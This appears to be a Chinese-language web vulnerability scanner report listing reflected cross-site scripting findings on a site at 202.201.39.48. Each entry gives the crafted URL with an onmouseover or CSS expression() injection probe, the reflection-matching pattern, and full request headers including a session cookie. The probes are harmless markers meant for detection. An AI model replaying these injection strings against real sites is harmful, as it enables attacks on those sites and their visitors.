  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/

URL http://202.201.39.48/index.php/article/c37/p2.html
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c37/p2.html?'%20onmouseover=%22dfbhmg(6035)%22%3e%20
2、设置参数 '%20onmouseover=%22dfbhmg(6035)%22%3e%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6035)
请求&响应 GET /index.php/article/c37/p2.html?'%20onmouseover=%22dfbhmg(6035)%22%3e%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c37.html

URL http://202.201.39.48/index.php/article/c37/p2.html
请求方式 GET
问题参数 var
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c37/p2.html?var='%20style=dfbhmg:expre/**/ssion(dfbhmg(6324))%20var=%20
2、设置参数 var'%20style=dfbhmg:expre/**/ssion(dfbhmg(6324))%20var=%20
3、在响应头及响应内容中匹配: style.*?dfbhmg:expre/**/ssion(dfbhmg(6324))
请求&响应 GET /index.php/article/c37/p2.html?var='%20style=dfbhmg:expre/**/ssion(dfbhmg(6324))%20var=%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c37.html

URL http://202.201.39.48/index.php/article/c37/p2.html
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c37/p2.html/'%20onmouseover=dfbhmg(6197)%20
2、设置参数 '%20onmouseover=dfbhmg(6197)%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6197)
请求&响应 GET /index.php/article/c37/p2.html/'%20onmouseover=dfbhmg(6197)%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c37.html

URL http://202.201.39.48/index.php/article/c37/p2.html
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c37/p2.html;'%20onmouseover=dfbhmg(6552)%20
2、设置参数 '%20onmouseover=dfbhmg(6552)%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6552)
请求&响应 GET /index.php/article/c37/p2.html;'%20onmouseover=dfbhmg(6552)%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c37.html

URL http://202.201.39.48/index.php/article/c37/p2.html
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c37/p2.html'%20onmouseover=%22dfbhmg(6473)%22%3e%20var=%20
2、设置参数 '%20onmouseover=%22dfbhmg(6473)%22%3e%20var=%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6473)
请求&响应 GET /index.php/article/c37/p2.html'%20onmouseover=%22dfbhmg(6473)%22%3e%20var=%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c37.html

URL http://202.201.39.48/index.php/article/c37.mhtml
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c37.mhtml?'%20onmouseover=dfbhmg(6555)%20
2、设置参数 '%20onmouseover=dfbhmg(6555)%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6555)
请求&响应 GET /index.php/article/c37.mhtml?'%20onmouseover=dfbhmg(6555)%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c37.html

URL http://202.201.39.48/index.php/article/c37.mhtml
请求方式 GET
问题参数 var
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c37.mhtml?var='%20onmouseover=dfbhmg(6143)%20var=%20
2、设置参数 var'%20onmouseover=dfbhmg(6143)%20var=%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6143)
请求&响应 GET /index.php/article/c37.mhtml?var='%20onmouseover=dfbhmg(6143)%20var=%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c37.html

URL http://202.201.39.48/index.php/article/c37.mhtml
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c37.mhtml/'%20onmouseover=dfbhmg(6980)%20var=%20
2、设置参数 '%20onmouseover=dfbhmg(6980)%20var=%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6980)
请求&响应 GET /index.php/article/c37.mhtml/'%20onmouseover=dfbhmg(6980)%20var=%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c37.html

URL http://202.201.39.48/index.php/article/c37.mhtml
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c37.mhtml;'%20onmouseover=%22dfbhmg(6099)%22%3e%20
2、设置参数 '%20onmouseover=%22dfbhmg(6099)%22%3e%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6099)
请求&响应 GET /index.php/article/c37.mhtml;'%20onmouseover=%22dfbhmg(6099)%22%3e%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c37.html

URL http://202.201.39.48/index.php/article/c37.mhtml
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c37.mhtml'%20onmouseover=%22dfbhmg(6040)%22%3e%20var=%20
2、设置参数 '%20onmouseover=%22dfbhmg(6040)%22%3e%20var=%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6040)
请求&响应 GET /index.php/article/c37.mhtml'%20onmouseover=%22dfbhmg(6040)%22%3e%20var=%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c37.html

URL http://202.201.39.48/index.php/article/36.mhtml
请求方式 GET
问题参数 value0
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/36'%20onmouseover=dfbhmg(6535)%20.mhtml
2、设置参数 value0'%20onmouseover=dfbhmg(6535)%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6535)
请求&响应 GET /index.php/article/36'%20onmouseover=dfbhmg(6535)%20.mhtml HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/36.html

URL http://202.201.39.48/index.php/page/18.html
请求方式 GET
问题参数 value0
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/page/"%20onmouseover=%22dfbhmg(6192)%22%3e%20.html
2、设置参数 value0"%20onmouseover=%22dfbhmg(6192)%22%3e%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6192)
请求&响应 GET /index.php/page/"%20onmouseover=%22dfbhmg(6192)%22%3e%20.html HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/sitemap/

URL http://202.201.39.48/index.php/article/37.html
请求方式 GET
问题参数 value0
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/37'%20onmouseover=%22dfbhmg(6360)%22%3e%20.html
2、设置参数 value0'%20onmouseover=%22dfbhmg(6360)%22%3e%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6360)
请求&响应 GET /index.php/article/37'%20onmouseover=%22dfbhmg(6360)%22%3e%20.html HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/sitemap/

URL http://202.201.39.48/index.php/article/c19.mhtml
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c19.mhtml?'%20onmouseover=dfbhmg(6566)%20
2、设置参数 '%20onmouseover=dfbhmg(6566)%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6566)
请求&响应 GET /index.php/article/c19.mhtml?'%20onmouseover=dfbhmg(6566)%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/index.mhtml

URL http://202.201.39.48/index.php/article/c19.mhtml
请求方式 GET
问题参数 var
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c19.mhtml?var='%20onmouseover=dfbhmg(6786)%20
2、设置参数 var'%20onmouseover=dfbhmg(6786)%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6786)
请求&响应 GET /index.php/article/c19.mhtml?var='%20onmouseover=dfbhmg(6786)%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/index.mhtml

URL http://202.201.39.48/index.php/article/c19.mhtml
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c19.mhtml/'%20onmouseover=%22dfbhmg(6209)%22%3e%20
2、设置参数 '%20onmouseover=%22dfbhmg(6209)%22%3e%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6209)
请求&响应 GET /index.php/article/c19.mhtml/'%20onmouseover=%22dfbhmg(6209)%22%3e%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/index.mhtml

URL http://202.201.39.48/index.php/article/c19.mhtml
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c19.mhtml;'%20onmouseover=%22dfbhmg(6183)%22%3e%20
2、设置参数 '%20onmouseover=%22dfbhmg(6183)%22%3e%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6183)
请求&响应 GET /index.php/article/c19.mhtml;'%20onmouseover=%22dfbhmg(6183)%22%3e%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/index.mhtml

URL http://202.201.39.48/index.php/article/c19.mhtml
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c19.mhtml'%20onmouseover=dfbhmg(6751)%20
2、设置参数 '%20onmouseover=dfbhmg(6751)%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6751)
请求&响应 GET /index.php/article/c19.mhtml'%20onmouseover=dfbhmg(6751)%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/index.mhtml

URL http://202.201.39.48/index.php/article/c33.mhtml
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c33.mhtml?'%20onmouseover=%22dfbhmg(6856)%22%3e%20
2、设置参数 '%20onmouseover=%22dfbhmg(6856)%22%3e%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6856)
请求&响应 GET /index.php/article/c33.mhtml?'%20onmouseover=%22dfbhmg(6856)%22%3e%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/index.mhtml

URL http://202.201.39.48/index.php/article/c33.mhtml
请求方式 GET
问题参数 var
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c33.mhtml?var='%20onmouseover=%22dfbhmg(6453)%22%3e%20
2、设置参数 var'%20onmouseover=%22dfbhmg(6453)%22%3e%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6453)
请求&响应 GET /index.php/article/c33.mhtml?var='%20onmouseover=%22dfbhmg(6453)%22%3e%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/index.mhtml

URL http://202.201.39.48/index.php/page/15.mhtml
请求方式 GET
问题参数 value0
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/page/"%20onmouseover=dfbhmg(6262)%20.mhtml
2、设置参数 value0"%20onmouseover=dfbhmg(6262)%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6262)
请求&响应 GET /index.php/page/"%20onmouseover=dfbhmg(6262)%20.mhtml HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/index.mhtml

URL http://202.201.39.48/index.php/article/c17.mhtml
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c17.mhtml?'%20onmouseover=dfbhmg(6970)%20var=%20
2、设置参数 '%20onmouseover=dfbhmg(6970)%20var=%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6970)
请求&响应 GET /index.php/article/c17.mhtml?'%20onmouseover=dfbhmg(6970)%20var=%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/index.mhtml

URL http://202.201.39.48/index.php/article/c17.mhtml
请求方式 GET
问题参数 var
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c17.mhtml?var='%20onmouseover=dfbhmg(6612)%20
2、设置参数 var'%20onmouseover=dfbhmg(6612)%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6612)
请求&响应 GET /index.php/article/c17.mhtml?var='%20onmouseover=dfbhmg(6612)%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/index.mhtml

URL http://202.201.39.48/index.php/article/c17.mhtml
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c17.mhtml/'%20onmouseover=%22dfbhmg(6608)%22%3e%20var=%20
2、设置参数 '%20onmouseover=%22dfbhmg(6608)%22%3e%20var=%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6608)
请求&响应 GET /index.php/article/c17.mhtml/'%20onmouseover=%22dfbhmg(6608)%22%3e%20var=%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/index.mhtml

URL http://202.201.39.48/index.php/article/c17.mhtml
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c17.mhtml;'%20onmouseover=%22dfbhmg(6071)%22%3e%20
2、设置参数 '%20onmouseover=%22dfbhmg(6071)%22%3e%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6071)
请求&响应 GET /index.php/article/c17.mhtml;'%20onmouseover=%22dfbhmg(6071)%22%3e%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/index.mhtml

URL http://202.201.39.48/index.php/article/c17.mhtml
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c17.mhtml'%20onmouseover=%22dfbhmg(6422)%22%3e%20
2、设置参数 '%20onmouseover=%22dfbhmg(6422)%22%3e%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6422)
请求&响应 GET /index.php/article/c17.mhtml'%20onmouseover=%22dfbhmg(6422)%22%3e%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/index.mhtml

URL http://202.201.39.48/index.php/article/33.mhtml
请求方式 GET
问题参数 value0
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/33'%20onmouseover=%22dfbhmg(6102)%22%3e%20.mhtml
2、设置参数 value0'%20onmouseover=%22dfbhmg(6102)%22%3e%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6102)
请求&响应 GET /index.php/article/33'%20onmouseover=%22dfbhmg(6102)%22%3e%20.mhtml HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
